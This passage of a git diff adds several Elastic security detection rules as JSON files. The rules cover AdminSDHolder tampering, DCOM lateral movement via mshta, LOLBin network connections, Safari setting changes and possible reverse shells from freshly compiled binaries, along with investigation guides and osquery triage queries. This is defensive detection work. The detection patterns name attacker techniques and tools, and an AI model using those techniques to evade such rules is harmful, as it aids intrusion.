16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "references": [ + "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", + "https://petri.com/active-directory-security-understanding-adminsdholder-object" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + }, + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_106.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_106.json new file mode 100644 index 00000000000..6da93aaac35 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_106.json @@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Distributed Component Object Model (DCOM) to execute commands from a remote host, which are launched via the HTA Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally while attempting to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming DCOM Lateral Movement via MSHTA", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "references": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "622ecb68-fa81-4601-90b5-f8cd661e4520", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.003", + "name": "Distributed Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1021/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "622ecb68-fa81-4601-90b5-f8cd661e4520_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_4.json b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_4.json new file mode 100644 index 00000000000..66c1f7b2d4e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_4.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies potentially malicious processes communicating via a port paring typically not associated with HTTP/HTTPS. For example, HTTP over port 8443 or port 440 as opposed to the traditional port 80 , 443. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Non-Standard Port HTTP/HTTPS connection", + "note": "## Triage and analysis\n\n### Investigating Potential Non-Standard Port HTTP/HTTPS connection\n\nAttackers may alter standard protocol ports, like using HTTP on port 8443 instead of 80, to bypass network filtering and complicate network data analysis. \n\nThis rule looks for HTTP/HTTPS processes where the destination port is not any of the default 80/443 HTTP/HTTPS ports. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate command and control activity or data exfiltration. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential suspicious network traffic, reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Network Activity to the Internet by Previously Unknown Executable - 53617418-17b4-4e9c-8a2c-8deb8086ca4b\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where process.name : (\"http\", \"https\") and destination.port not in (80, 443) and event.action in (\n \"connection_attempted\", \"ipv4_connection_attempt_event\", \"connection_accepted\", \"ipv4_connection_accept_event\"\n) and destination.ip != \"127.0.0.1\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "62b68eb2-1e47-4da7-85b6-8f478db5b272", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1571", + "name": "Non-Standard Port", + "reference": "https://attack.mitre.org/techniques/T1571/" + }, + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + }, + { + "id": "T1573", + "name": "Encrypted Channel", + "reference": "https://attack.mitre.org/techniques/T1573/", + "subtechnique": [ + { + "id": "T1573.001", + "name": "Symmetric Cryptography", + "reference": "https://attack.mitre.org/techniques/T1573/001/" + }, + { + "id": "T1573.002", + "name": "Asymmetric Cryptography", + "reference": "https://attack.mitre.org/techniques/T1573/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "62b68eb2-1e47-4da7-85b6-8f478db5b272_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_107.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_107.json new file mode 100644 index 00000000000..22be1e84ba7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_107.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Signed Binary", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "63e65ec3-43b1-45b0-8f2d-45b34291dc44", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "63e65ec3-43b1-45b0-8f2d-45b34291dc44_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_106.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_106.json new file mode 100644 index 00000000000..cf98d2e80c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies changes to the Safari configuration using the built-in defaults command. Adversaries may attempt to enable or disable certain Safari settings, such as enabling JavaScript from Apple Events to ease in the hijacking of the users browser.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of Safari Settings via Defaults Command", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.name:defaults and process.args:\n (com.apple.Safari and write and not\n (\n UniversalSearchEnabled or\n SuppressSearchSuggestions or\n WebKitTabToLinksPreferenceKey or\n ShowFullURLInSmartSearchField or\n com.apple.Safari.ContentPageGroupIdentifier.WebKit2TabsToLinks\n )\n )\n", + "references": [ + "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6482255d-f468-45ea-a5b3-d3a7de1331ae", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "6482255d-f468-45ea-a5b3-d3a7de1331ae_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_5.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_5.json new file mode 100644 index 00000000000..4519c356a30 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_5.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Recently Compiled Executable", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"gcc\", \"g++\", \"cc\")] by process.args\n [file where host.os.type == \"linux\" and event.action == \"creation\" and process.name == \"ld\"] by file.name\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\"] by process.name\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and destination.ip != null and \n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")] by process.name\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "64cfca9e-0f6f-4048-8251-9ec56a055e9e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "64cfca9e-0f6f-4048-8251-9ec56a055e9e_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107.json new file mode 100644 index 00000000000..40433fdffa2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands to mount a Server Message Block (SMB) network share. Adversaries may use valid accounts to interact with a remote network share using SMB.", + "from": "now-9m", + "index": [ + 